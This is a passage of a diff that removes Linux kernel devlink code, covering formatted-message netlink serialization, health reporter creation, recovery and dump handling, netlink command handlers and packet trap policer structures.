+-		return nla_put(skb, attrtype, msg->len, (void *) &msg->value);
+-	default:
+-		return -EINVAL;
+-	}
+-}
+-
+-static int
+-devlink_fmsg_prepare_skb(struct devlink_fmsg *fmsg, struct sk_buff *skb,
+-			 int *start)
+-{
+-	struct devlink_fmsg_item *item;
+-	struct nlattr *fmsg_nlattr;
+-	int i = 0;
+-	int err;
+-
+-	fmsg_nlattr = nla_nest_start_noflag(skb, DEVLINK_ATTR_FMSG);
+-	if (!fmsg_nlattr)
+-		return -EMSGSIZE;
+-
+-	list_for_each_entry(item, &fmsg->item_list, list) {
+-		if (i < *start) {
+-			i++;
+-			continue;
+-		}
+-
+-		switch (item->attrtype) {
+-		case DEVLINK_ATTR_FMSG_OBJ_NEST_START:
+-		case DEVLINK_ATTR_FMSG_PAIR_NEST_START:
+-		case DEVLINK_ATTR_FMSG_ARR_NEST_START:
+-		case DEVLINK_ATTR_FMSG_NEST_END:
+-			err = nla_put_flag(skb, item->attrtype);
+-			break;
+-		case DEVLINK_ATTR_FMSG_OBJ_VALUE_DATA:
+-			err = devlink_fmsg_item_fill_type(item, skb);
+-			if (err)
+-				break;
+-			err = devlink_fmsg_item_fill_data(item, skb);
+-			break;
+-		case DEVLINK_ATTR_FMSG_OBJ_NAME:
+-			err = nla_put_string(skb, item->attrtype,
+-					     (char *) &item->value);
+-			break;
+-		default:
+-			err = -EINVAL;
+-			break;
+-		}
+-		if (!err)
+-			*start = ++i;
+-		else
+-			break;
+-	}
+-
+-	nla_nest_end(skb, fmsg_nlattr);
+-	return err;
+-}
+-
+-static int devlink_fmsg_snd(struct devlink_fmsg *fmsg,
+-			    struct genl_info *info,
+-			    enum devlink_command cmd, int flags)
+-{
+-	struct nlmsghdr *nlh;
+-	struct sk_buff *skb;
+-	bool last = false;
+-	int index = 0;
+-	void *hdr;
+-	int err;
+-
+-	while (!last) {
+-		int tmp_index = index;
+-
+-		skb = genlmsg_new(GENLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-		if (!skb)
+-			return -ENOMEM;
+-
+-		hdr = genlmsg_put(skb, info->snd_portid, info->snd_seq,
+-				  &devlink_nl_family, flags | NLM_F_MULTI, cmd);
+-		if (!hdr) {
+-			err = -EMSGSIZE;
+-			goto nla_put_failure;
+-		}
+-
+-		err = devlink_fmsg_prepare_skb(fmsg, skb, &index);
+-		if (!err)
+-			last = true;
+-		else if (err != -EMSGSIZE || tmp_index == index)
+-			goto nla_put_failure;
+-
+-		genlmsg_end(skb, hdr);
+-		err = genlmsg_reply(skb, info);
+-		if (err)
+-			return err;
+-	}
+-
+-	skb = genlmsg_new(GENLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!skb)
+-		return -ENOMEM;
+-	nlh = nlmsg_put(skb, info->snd_portid, info->snd_seq,
+-			NLMSG_DONE, 0, flags | NLM_F_MULTI);
+-	if (!nlh) {
+-		err = -EMSGSIZE;
+-		goto nla_put_failure;
+-	}
+-
+-	return genlmsg_reply(skb, info);
+-
+-nla_put_failure:
+-	nlmsg_free(skb);
+-	return err;
+-}
+-
+-static int devlink_fmsg_dumpit(struct devlink_fmsg *fmsg, struct sk_buff *skb,
+-			       struct netlink_callback *cb,
+-			       enum devlink_command cmd)
+-{
+-	int index = cb->args[0];
+-	int tmp_index = index;
+-	void *hdr;
+-	int err;
+-
+-	hdr = genlmsg_put(skb, NETLINK_CB(cb->skb).portid, cb->nlh->nlmsg_seq,
+-			  &devlink_nl_family, NLM_F_ACK | NLM_F_MULTI, cmd);
+-	if (!hdr) {
+-		err = -EMSGSIZE;
+-		goto nla_put_failure;
+-	}
+-
+-	err = devlink_fmsg_prepare_skb(fmsg, skb, &index);
+-	if ((err && err != -EMSGSIZE) || tmp_index == index)
+-		goto nla_put_failure;
+-
+-	cb->args[0] = index;
+-	genlmsg_end(skb, hdr);
+-	return skb->len;
+-
+-nla_put_failure:
+-	genlmsg_cancel(skb, hdr);
+-	return err;
+-}
+-
+-struct devlink_health_reporter {
+-	struct list_head list;
+-	void *priv;
+-	const struct devlink_health_reporter_ops *ops;
+-	struct devlink *devlink;
+-	struct devlink_port *devlink_port;
+-	struct devlink_fmsg *dump_fmsg;
+-	struct mutex dump_lock; /* lock parallel read/write from dump buffers */
+-	u64 graceful_period;
+-	bool auto_recover;
+-	bool auto_dump;
+-	u8 health_state;
+-	u64 dump_ts;
+-	u64 dump_real_ts;
+-	u64 error_count;
+-	u64 recovery_count;
+-	u64 last_recovery_ts;
+-	refcount_t refcount;
+-};
+-
+-void *
+-devlink_health_reporter_priv(struct devlink_health_reporter *reporter)
+-{
+-	return reporter->priv;
+-}
+-EXPORT_SYMBOL_GPL(devlink_health_reporter_priv);
+-
+-static struct devlink_health_reporter *
+-__devlink_health_reporter_find_by_name(struct list_head *reporter_list,
+-				       struct mutex *list_lock,
+-				       const char *reporter_name)
+-{
+-	struct devlink_health_reporter *reporter;
+-
+-	lockdep_assert_held(list_lock);
+-	list_for_each_entry(reporter, reporter_list, list)
+-		if (!strcmp(reporter->ops->name, reporter_name))
+-			return reporter;
+-	return NULL;
+-}
+-
+-static struct devlink_health_reporter *
+-devlink_health_reporter_find_by_name(struct devlink *devlink,
+-				     const char *reporter_name)
+-{
+-	return __devlink_health_reporter_find_by_name(&devlink->reporter_list,
+-						      &devlink->reporters_lock,
+-						      reporter_name);
+-}
+-
+-static struct devlink_health_reporter *
+-devlink_port_health_reporter_find_by_name(struct devlink_port *devlink_port,
+-					  const char *reporter_name)
+-{
+-	return __devlink_health_reporter_find_by_name(&devlink_port->reporter_list,
+-						      &devlink_port->reporters_lock,
+-						      reporter_name);
+-}
+-
+-static struct devlink_health_reporter *
+-__devlink_health_reporter_create(struct devlink *devlink,
+-				 const struct devlink_health_reporter_ops *ops,
+-				 u64 graceful_period, void *priv)
+-{
+-	struct devlink_health_reporter *reporter;
+-
+-	if (WARN_ON(graceful_period && !ops->recover))
+-		return ERR_PTR(-EINVAL);
+-
+-	reporter = kzalloc(sizeof(*reporter), GFP_KERNEL);
+-	if (!reporter)
+-		return ERR_PTR(-ENOMEM);
+-
+-	reporter->priv = priv;
+-	reporter->ops = ops;
+-	reporter->devlink = devlink;
+-	reporter->graceful_period = graceful_period;
+-	reporter->auto_recover = !!ops->recover;
+-	reporter->auto_dump = !!ops->dump;
+-	mutex_init(&reporter->dump_lock);
+-	refcount_set(&reporter->refcount, 1);
+-	return reporter;
+-}
+-
+-/**
+- *	devlink_port_health_reporter_create - create devlink health reporter for
+- *	                                      specified port instance
+- *
+- *	@port: devlink_port which should contain the new reporter
+- *	@ops: ops
+- *	@graceful_period: to avoid recovery loops, in msecs
+- *	@priv: priv
+- */
+-struct devlink_health_reporter *
+-devlink_port_health_reporter_create(struct devlink_port *port,
+-				    const struct devlink_health_reporter_ops *ops,
+-				    u64 graceful_period, void *priv)
+-{
+-	struct devlink_health_reporter *reporter;
+-
+-	mutex_lock(&port->reporters_lock);
+-	if (__devlink_health_reporter_find_by_name(&port->reporter_list,
+-						   &port->reporters_lock, ops->name)) {
+-		reporter = ERR_PTR(-EEXIST);
+-		goto unlock;
+-	}
+-
+-	reporter = __devlink_health_reporter_create(port->devlink, ops,
+-						    graceful_period, priv);
+-	if (IS_ERR(reporter))
+-		goto unlock;
+-
+-	reporter->devlink_port = port;
+-	list_add_tail(&reporter->list, &port->reporter_list);
+-unlock:
+-	mutex_unlock(&port->reporters_lock);
+-	return reporter;
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_health_reporter_create);
+-
+-/**
+- *	devlink_health_reporter_create - create devlink health reporter
+- *
+- *	@devlink: devlink
+- *	@ops: ops
+- *	@graceful_period: to avoid recovery loops, in msecs
+- *	@priv: priv
+- */
+-struct devlink_health_reporter *
+-devlink_health_reporter_create(struct devlink *devlink,
+-			       const struct devlink_health_reporter_ops *ops,
+-			       u64 graceful_period, void *priv)
+-{
+-	struct devlink_health_reporter *reporter;
+-
+-	mutex_lock(&devlink->reporters_lock);
+-	if (devlink_health_reporter_find_by_name(devlink, ops->name)) {
+-		reporter = ERR_PTR(-EEXIST);
+-		goto unlock;
+-	}
+-
+-	reporter = __devlink_health_reporter_create(devlink, ops,
+-						    graceful_period, priv);
+-	if (IS_ERR(reporter))
+-		goto unlock;
+-
+-	list_add_tail(&reporter->list, &devlink->reporter_list);
+-unlock:
+-	mutex_unlock(&devlink->reporters_lock);
+-	return reporter;
+-}
+-EXPORT_SYMBOL_GPL(devlink_health_reporter_create);
+-
+-static void
+-devlink_health_reporter_free(struct devlink_health_reporter *reporter)
+-{
+-	mutex_destroy(&reporter->dump_lock);
+-	if (reporter->dump_fmsg)
+-		devlink_fmsg_free(reporter->dump_fmsg);
+-	kfree(reporter);
+-}
+-
+-static void
+-devlink_health_reporter_put(struct devlink_health_reporter *reporter)
+-{
+-	if (refcount_dec_and_test(&reporter->refcount))
+-		devlink_health_reporter_free(reporter);
+-}
+-
+-static void
+-__devlink_health_reporter_destroy(struct devlink_health_reporter *reporter)
+-{
+-	list_del(&reporter->list);
+-	devlink_health_reporter_put(reporter);
+-}
+-
+-/**
+- *	devlink_health_reporter_destroy - destroy devlink health reporter
+- *
+- *	@reporter: devlink health reporter to destroy
+- */
+-void
+-devlink_health_reporter_destroy(struct devlink_health_reporter *reporter)
+-{
+-	struct mutex *lock = &reporter->devlink->reporters_lock;
+-
+-	mutex_lock(lock);
+-	__devlink_health_reporter_destroy(reporter);
+-	mutex_unlock(lock);
+-}
+-EXPORT_SYMBOL_GPL(devlink_health_reporter_destroy);
+-
+-/**
+- *	devlink_port_health_reporter_destroy - destroy devlink port health reporter
+- *
+- *	@reporter: devlink health reporter to destroy
+- */
+-void
+-devlink_port_health_reporter_destroy(struct devlink_health_reporter *reporter)
+-{
+-	struct mutex *lock = &reporter->devlink_port->reporters_lock;
+-
+-	mutex_lock(lock);
+-	__devlink_health_reporter_destroy(reporter);
+-	mutex_unlock(lock);
+-}
+-EXPORT_SYMBOL_GPL(devlink_port_health_reporter_destroy);
+-
+-static int
+-devlink_nl_health_reporter_fill(struct sk_buff *msg,
+-				struct devlink_health_reporter *reporter,
+-				enum devlink_command cmd, u32 portid,
+-				u32 seq, int flags)
+-{
+-	struct devlink *devlink = reporter->devlink;
+-	struct nlattr *reporter_attr;
+-	void *hdr;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto genlmsg_cancel;
+-
+-	if (reporter->devlink_port) {
+-		if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX, reporter->devlink_port->index))
+-			goto genlmsg_cancel;
+-	}
+-	reporter_attr = nla_nest_start_noflag(msg,
+-					      DEVLINK_ATTR_HEALTH_REPORTER);
+-	if (!reporter_attr)
+-		goto genlmsg_cancel;
+-	if (nla_put_string(msg, DEVLINK_ATTR_HEALTH_REPORTER_NAME,
+-			   reporter->ops->name))
+-		goto reporter_nest_cancel;
+-	if (nla_put_u8(msg, DEVLINK_ATTR_HEALTH_REPORTER_STATE,
+-		       reporter->health_state))
+-		goto reporter_nest_cancel;
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_HEALTH_REPORTER_ERR_COUNT,
+-			      reporter->error_count, DEVLINK_ATTR_PAD))
+-		goto reporter_nest_cancel;
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_HEALTH_REPORTER_RECOVER_COUNT,
+-			      reporter->recovery_count, DEVLINK_ATTR_PAD))
+-		goto reporter_nest_cancel;
+-	if (reporter->ops->recover &&
+-	    nla_put_u64_64bit(msg, DEVLINK_ATTR_HEALTH_REPORTER_GRACEFUL_PERIOD,
+-			      reporter->graceful_period,
+-			      DEVLINK_ATTR_PAD))
+-		goto reporter_nest_cancel;
+-	if (reporter->ops->recover &&
+-	    nla_put_u8(msg, DEVLINK_ATTR_HEALTH_REPORTER_AUTO_RECOVER,
+-		       reporter->auto_recover))
+-		goto reporter_nest_cancel;
+-	if (reporter->dump_fmsg &&
+-	    nla_put_u64_64bit(msg, DEVLINK_ATTR_HEALTH_REPORTER_DUMP_TS,
+-			      jiffies_to_msecs(reporter->dump_ts),
+-			      DEVLINK_ATTR_PAD))
+-		goto reporter_nest_cancel;
+-	if (reporter->dump_fmsg &&
+-	    nla_put_u64_64bit(msg, DEVLINK_ATTR_HEALTH_REPORTER_DUMP_TS_NS,
+-			      reporter->dump_real_ts, DEVLINK_ATTR_PAD))
+-		goto reporter_nest_cancel;
+-	if (reporter->ops->dump &&
+-	    nla_put_u8(msg, DEVLINK_ATTR_HEALTH_REPORTER_AUTO_DUMP,
+-		       reporter->auto_dump))
+-		goto reporter_nest_cancel;
+-
+-	nla_nest_end(msg, reporter_attr);
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-reporter_nest_cancel:
+-	nla_nest_end(msg, reporter_attr);
+-genlmsg_cancel:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static void devlink_recover_notify(struct devlink_health_reporter *reporter,
+-				   enum devlink_command cmd)
+-{
+-	struct devlink *devlink = reporter->devlink;
+-	struct sk_buff *msg;
+-	int err;
+-
+-	WARN_ON(cmd != DEVLINK_CMD_HEALTH_REPORTER_RECOVER);
+-	WARN_ON(!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED));
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return;
+-
+-	err = devlink_nl_health_reporter_fill(msg, reporter, cmd, 0, 0, 0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return;
+-	}
+-
+-	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink), msg,
+-				0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
+-}
+-
+-void
+-devlink_health_reporter_recovery_done(struct devlink_health_reporter *reporter)
+-{
+-	reporter->recovery_count++;
+-	reporter->last_recovery_ts = jiffies;
+-}
+-EXPORT_SYMBOL_GPL(devlink_health_reporter_recovery_done);
+-
+-static int
+-devlink_health_reporter_recover(struct devlink_health_reporter *reporter,
+-				void *priv_ctx, struct netlink_ext_ack *extack)
+-{
+-	int err;
+-
+-	if (reporter->health_state == DEVLINK_HEALTH_REPORTER_STATE_HEALTHY)
+-		return 0;
+-
+-	if (!reporter->ops->recover)
+-		return -EOPNOTSUPP;
+-
+-	err = reporter->ops->recover(reporter, priv_ctx, extack);
+-	if (err)
+-		return err;
+-
+-	devlink_health_reporter_recovery_done(reporter);
+-	reporter->health_state = DEVLINK_HEALTH_REPORTER_STATE_HEALTHY;
+-	devlink_recover_notify(reporter, DEVLINK_CMD_HEALTH_REPORTER_RECOVER);
+-
+-	return 0;
+-}
+-
+-static void
+-devlink_health_dump_clear(struct devlink_health_reporter *reporter)
+-{
+-	if (!reporter->dump_fmsg)
+-		return;
+-	devlink_fmsg_free(reporter->dump_fmsg);
+-	reporter->dump_fmsg = NULL;
+-}
+-
+-static int devlink_health_do_dump(struct devlink_health_reporter *reporter,
+-				  void *priv_ctx,
+-				  struct netlink_ext_ack *extack)
+-{
+-	int err;
+-
+-	if (!reporter->ops->dump)
+-		return 0;
+-
+-	if (reporter->dump_fmsg)
+-		return 0;
+-
+-	reporter->dump_fmsg = devlink_fmsg_alloc();
+-	if (!reporter->dump_fmsg) {
+-		err = -ENOMEM;
+-		return err;
+-	}
+-
+-	err = devlink_fmsg_obj_nest_start(reporter->dump_fmsg);
+-	if (err)
+-		goto dump_err;
+-
+-	err = reporter->ops->dump(reporter, reporter->dump_fmsg,
+-				  priv_ctx, extack);
+-	if (err)
+-		goto dump_err;
+-
+-	err = devlink_fmsg_obj_nest_end(reporter->dump_fmsg);
+-	if (err)
+-		goto dump_err;
+-
+-	reporter->dump_ts = jiffies;
+-	reporter->dump_real_ts = ktime_get_real_ns();
+-
+-	return 0;
+-
+-dump_err:
+-	devlink_health_dump_clear(reporter);
+-	return err;
+-}
+-
+-int devlink_health_report(struct devlink_health_reporter *reporter,
+-			  const char *msg, void *priv_ctx)
+-{
+-	enum devlink_health_reporter_state prev_health_state;
+-	struct devlink *devlink = reporter->devlink;
+-	unsigned long recover_ts_threshold;
+-	int ret;
+-
+-	/* write a log message of the current error */
+-	WARN_ON(!msg);
+-	trace_devlink_health_report(devlink, reporter->ops->name, msg);
+-	reporter->error_count++;
+-	prev_health_state = reporter->health_state;
+-	reporter->health_state = DEVLINK_HEALTH_REPORTER_STATE_ERROR;
+-	devlink_recover_notify(reporter, DEVLINK_CMD_HEALTH_REPORTER_RECOVER);
+-
+-	/* abort if the previous error wasn't recovered */
+-	recover_ts_threshold = reporter->last_recovery_ts +
+-			       msecs_to_jiffies(reporter->graceful_period);
+-	if (reporter->auto_recover &&
+-	    (prev_health_state != DEVLINK_HEALTH_REPORTER_STATE_HEALTHY ||
+-	     (reporter->last_recovery_ts && reporter->recovery_count &&
+-	      time_is_after_jiffies(recover_ts_threshold)))) {
+-		trace_devlink_health_recover_aborted(devlink,
+-						     reporter->ops->name,
+-						     reporter->health_state,
+-						     jiffies -
+-						     reporter->last_recovery_ts);
+-		return -ECANCELED;
+-	}
+-
+-	reporter->health_state = DEVLINK_HEALTH_REPORTER_STATE_ERROR;
+-
+-	if (reporter->auto_dump) {
+-		mutex_lock(&reporter->dump_lock);
+-		/* store current dump of current error, for later analysis */
+-		devlink_health_do_dump(reporter, priv_ctx, NULL);
+-		mutex_unlock(&reporter->dump_lock);
+-	}
+-
+-	if (!reporter->auto_recover)
+-		return 0;
+-
+-	devl_lock(devlink);
+-	ret = devlink_health_reporter_recover(reporter, priv_ctx, NULL);
+-	devl_unlock(devlink);
+-
+-	return ret;
+-}
+-EXPORT_SYMBOL_GPL(devlink_health_report);
+-
+-static struct devlink_health_reporter *
+-devlink_health_reporter_get_from_attrs(struct devlink *devlink,
+-				       struct nlattr **attrs)
+-{
+-	struct devlink_health_reporter *reporter;
+-	struct devlink_port *devlink_port;
+-	char *reporter_name;
+-
+-	if (!attrs[DEVLINK_ATTR_HEALTH_REPORTER_NAME])
+-		return NULL;
+-
+-	reporter_name = nla_data(attrs[DEVLINK_ATTR_HEALTH_REPORTER_NAME]);
+-	devlink_port = devlink_port_get_from_attrs(devlink, attrs);
+-	if (IS_ERR(devlink_port)) {
+-		mutex_lock(&devlink->reporters_lock);
+-		reporter = devlink_health_reporter_find_by_name(devlink, reporter_name);
+-		if (reporter)
+-			refcount_inc(&reporter->refcount);
+-		mutex_unlock(&devlink->reporters_lock);
+-	} else {
+-		mutex_lock(&devlink_port->reporters_lock);
+-		reporter = devlink_port_health_reporter_find_by_name(devlink_port, reporter_name);
+-		if (reporter)
+-			refcount_inc(&reporter->refcount);
+-		mutex_unlock(&devlink_port->reporters_lock);
+-	}
+-
+-	return reporter;
+-}
+-
+-static struct devlink_health_reporter *
+-devlink_health_reporter_get_from_info(struct devlink *devlink,
+-				      struct genl_info *info)
+-{
+-	return devlink_health_reporter_get_from_attrs(devlink, info->attrs);
+-}
+-
+-static struct devlink_health_reporter *
+-devlink_health_reporter_get_from_cb(struct netlink_callback *cb)
+-{
+-	const struct genl_dumpit_info *info = genl_dumpit_info(cb);
+-	struct devlink_health_reporter *reporter;
+-	struct nlattr **attrs = info->attrs;
+-	struct devlink *devlink;
+-
+-	devlink = devlink_get_from_attrs(sock_net(cb->skb->sk), attrs);
+-	if (IS_ERR(devlink))
+-		return NULL;
+-
+-	reporter = devlink_health_reporter_get_from_attrs(devlink, attrs);
+-	devlink_put(devlink);
+-	return reporter;
+-}
+-
+-void
+-devlink_health_reporter_state_update(struct devlink_health_reporter *reporter,
+-				     enum devlink_health_reporter_state state)
+-{
+-	if (WARN_ON(state != DEVLINK_HEALTH_REPORTER_STATE_HEALTHY &&
+-		    state != DEVLINK_HEALTH_REPORTER_STATE_ERROR))
+-		return;
+-
+-	if (reporter->health_state == state)
+-		return;
+-
+-	reporter->health_state = state;
+-	trace_devlink_health_reporter_state_update(reporter->devlink,
+-						   reporter->ops->name, state);
+-	devlink_recover_notify(reporter, DEVLINK_CMD_HEALTH_REPORTER_RECOVER);
+-}
+-EXPORT_SYMBOL_GPL(devlink_health_reporter_state_update);
+-
+-static int devlink_nl_cmd_health_reporter_get_doit(struct sk_buff *skb,
+-						   struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_health_reporter *reporter;
+-	struct sk_buff *msg;
+-	int err;
+-
+-	reporter = devlink_health_reporter_get_from_info(devlink, info);
+-	if (!reporter)
+-		return -EINVAL;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg) {
+-		err = -ENOMEM;
+-		goto out;
+-	}
+-
+-	err = devlink_nl_health_reporter_fill(msg, reporter,
+-					      DEVLINK_CMD_HEALTH_REPORTER_GET,
+-					      info->snd_portid, info->snd_seq,
+-					      0);
+-	if (err) {
+-		nlmsg_free(msg);
+-		goto out;
+-	}
+-
+-	err = genlmsg_reply(msg, info);
+-out:
+-	devlink_health_reporter_put(reporter);
+-	return err;
+-}
+-
+-static int
+-devlink_nl_cmd_health_reporter_get_dumpit(struct sk_buff *msg,
+-					  struct netlink_callback *cb)
+-{
+-	struct devlink_health_reporter *reporter;
+-	struct devlink_port *port;
+-	struct devlink *devlink;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		mutex_lock(&devlink->reporters_lock);
+-		list_for_each_entry(reporter, &devlink->reporter_list,
+-				    list) {
+-			if (idx < start) {
+-				idx++;
+-				continue;
+-			}
+-			err = devlink_nl_health_reporter_fill(
+-				msg, reporter, DEVLINK_CMD_HEALTH_REPORTER_GET,
+-				NETLINK_CB(cb->skb).portid, cb->nlh->nlmsg_seq,
+-				NLM_F_MULTI);
+-			if (err) {
+-				mutex_unlock(&devlink->reporters_lock);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-			idx++;
+-		}
+-		mutex_unlock(&devlink->reporters_lock);
+-		devlink_put(devlink);
+-	}
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		devl_lock(devlink);
+-		list_for_each_entry(port, &devlink->port_list, list) {
+-			mutex_lock(&port->reporters_lock);
+-			list_for_each_entry(reporter, &port->reporter_list, list) {
+-				if (idx < start) {
+-					idx++;
+-					continue;
+-				}
+-				err = devlink_nl_health_reporter_fill(
+-					msg, reporter,
+-					DEVLINK_CMD_HEALTH_REPORTER_GET,
+-					NETLINK_CB(cb->skb).portid,
+-					cb->nlh->nlmsg_seq, NLM_F_MULTI);
+-				if (err) {
+-					mutex_unlock(&port->reporters_lock);
+-					devl_unlock(devlink);
+-					devlink_put(devlink);
+-					goto out;
+-				}
+-				idx++;
+-			}
+-			mutex_unlock(&port->reporters_lock);
+-		}
+-		devl_unlock(devlink);
+-		devlink_put(devlink);
+-	}
+-out:
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int
+-devlink_nl_cmd_health_reporter_set_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_health_reporter *reporter;
+-	int err;
+-
+-	reporter = devlink_health_reporter_get_from_info(devlink, info);
+-	if (!reporter)
+-		return -EINVAL;
+-
+-	if (!reporter->ops->recover &&
+-	    (info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_GRACEFUL_PERIOD] ||
+-	     info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_RECOVER])) {
+-		err = -EOPNOTSUPP;
+-		goto out;
+-	}
+-	if (!reporter->ops->dump &&
+-	    info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_DUMP]) {
+-		err = -EOPNOTSUPP;
+-		goto out;
+-	}
+-
+-	if (info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_GRACEFUL_PERIOD])
+-		reporter->graceful_period =
+-			nla_get_u64(info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_GRACEFUL_PERIOD]);
+-
+-	if (info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_RECOVER])
+-		reporter->auto_recover =
+-			nla_get_u8(info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_RECOVER]);
+-
+-	if (info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_DUMP])
+-		reporter->auto_dump =
+-		nla_get_u8(info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_DUMP]);
+-
+-	devlink_health_reporter_put(reporter);
+-	return 0;
+-out:
+-	devlink_health_reporter_put(reporter);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_health_reporter_recover_doit(struct sk_buff *skb,
+-						       struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_health_reporter *reporter;
+-	int err;
+-
+-	reporter = devlink_health_reporter_get_from_info(devlink, info);
+-	if (!reporter)
+-		return -EINVAL;
+-
+-	err = devlink_health_reporter_recover(reporter, NULL, info->extack);
+-
+-	devlink_health_reporter_put(reporter);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_health_reporter_diagnose_doit(struct sk_buff *skb,
+-							struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_health_reporter *reporter;
+-	struct devlink_fmsg *fmsg;
+-	int err;
+-
+-	reporter = devlink_health_reporter_get_from_info(devlink, info);
+-	if (!reporter)
+-		return -EINVAL;
+-
+-	if (!reporter->ops->diagnose) {
+-		devlink_health_reporter_put(reporter);
+-		return -EOPNOTSUPP;
+-	}
+-
+-	fmsg = devlink_fmsg_alloc();
+-	if (!fmsg) {
+-		devlink_health_reporter_put(reporter);
+-		return -ENOMEM;
+-	}
+-
+-	err = devlink_fmsg_obj_nest_start(fmsg);
+-	if (err)
+-		goto out;
+-
+-	err = reporter->ops->diagnose(reporter, fmsg, info->extack);
+-	if (err)
+-		goto out;
+-
+-	err = devlink_fmsg_obj_nest_end(fmsg);
+-	if (err)
+-		goto out;
+-
+-	err = devlink_fmsg_snd(fmsg, info,
+-			       DEVLINK_CMD_HEALTH_REPORTER_DIAGNOSE, 0);
+-
+-out:
+-	devlink_fmsg_free(fmsg);
+-	devlink_health_reporter_put(reporter);
+-	return err;
+-}
+-
+-static int
+-devlink_nl_cmd_health_reporter_dump_get_dumpit(struct sk_buff *skb,
+-					       struct netlink_callback *cb)
+-{
+-	struct devlink_health_reporter *reporter;
+-	u64 start = cb->args[0];
+-	int err;
+-
+-	reporter = devlink_health_reporter_get_from_cb(cb);
+-	if (!reporter)
+-		return -EINVAL;
+-
+-	if (!reporter->ops->dump) {
+-		err = -EOPNOTSUPP;
+-		goto out;
+-	}
+-	mutex_lock(&reporter->dump_lock);
+-	if (!start) {
+-		err = devlink_health_do_dump(reporter, NULL, cb->extack);
+-		if (err)
+-			goto unlock;
+-		cb->args[1] = reporter->dump_ts;
+-	}
+-	if (!reporter->dump_fmsg || cb->args[1] != reporter->dump_ts) {
+-		NL_SET_ERR_MSG_MOD(cb->extack, "Dump trampled, please retry");
+-		err = -EAGAIN;
+-		goto unlock;
+-	}
+-
+-	err = devlink_fmsg_dumpit(reporter->dump_fmsg, skb, cb,
+-				  DEVLINK_CMD_HEALTH_REPORTER_DUMP_GET);
+-unlock:
+-	mutex_unlock(&reporter->dump_lock);
+-out:
+-	devlink_health_reporter_put(reporter);
+-	return err;
+-}
+-
+-static int
+-devlink_nl_cmd_health_reporter_dump_clear_doit(struct sk_buff *skb,
+-					       struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_health_reporter *reporter;
+-
+-	reporter = devlink_health_reporter_get_from_info(devlink, info);
+-	if (!reporter)
+-		return -EINVAL;
+-
+-	if (!reporter->ops->dump) {
+-		devlink_health_reporter_put(reporter);
+-		return -EOPNOTSUPP;
+-	}
+-
+-	mutex_lock(&reporter->dump_lock);
+-	devlink_health_dump_clear(reporter);
+-	mutex_unlock(&reporter->dump_lock);
+-	devlink_health_reporter_put(reporter);
+-	return 0;
+-}
+-
+-static int devlink_nl_cmd_health_reporter_test_doit(struct sk_buff *skb,
+-						    struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_health_reporter *reporter;
+-	int err;
+-
+-	reporter = devlink_health_reporter_get_from_info(devlink, info);
+-	if (!reporter)
+-		return -EINVAL;
+-
+-	if (!reporter->ops->test) {
+-		devlink_health_reporter_put(reporter);
+-		return -EOPNOTSUPP;
+-	}
+-
+-	err = reporter->ops->test(reporter, info->extack);
+-
+-	devlink_health_reporter_put(reporter);
+-	return err;
+-}
+-
+-struct devlink_stats {
+-	u64_stats_t rx_bytes;
+-	u64_stats_t rx_packets;
+-	struct u64_stats_sync syncp;
+-};
+-
+-/**
+- * struct devlink_trap_policer_item - Packet trap policer attributes.
+- * @policer: Immutable packet trap policer attributes.
+- * @rate: Rate in packets / sec.
+- * @burst: Burst size in packets.
+- * @list: trap_policer_list member.
+- *
+- * Describes packet trap policer attributes. Created by devlink during trap
+- * policer registration.
+- */
+-struct devlink_trap_policer_item {
+-	const struct devlink_trap_policer *policer;
+-	u64 rate;
+-	u64 burst;
+-	struct list_head list;
+-};
+-
+-/**
+- * struct devlink_trap_group_item - Packet trap group attributes.
+- * @group: Immutable packet trap group attributes.
+- * @policer_item: Associated policer item. Can be NULL.
+- * @list: trap_group_list member.
+- * @stats: Trap group statistics.
+- *
+- * Describes packet trap group attributes. Created by devlink during trap
+- * group registration.
+- */
+-struct devlink_trap_group_item {
+-	const struct devlink_trap_group *group;
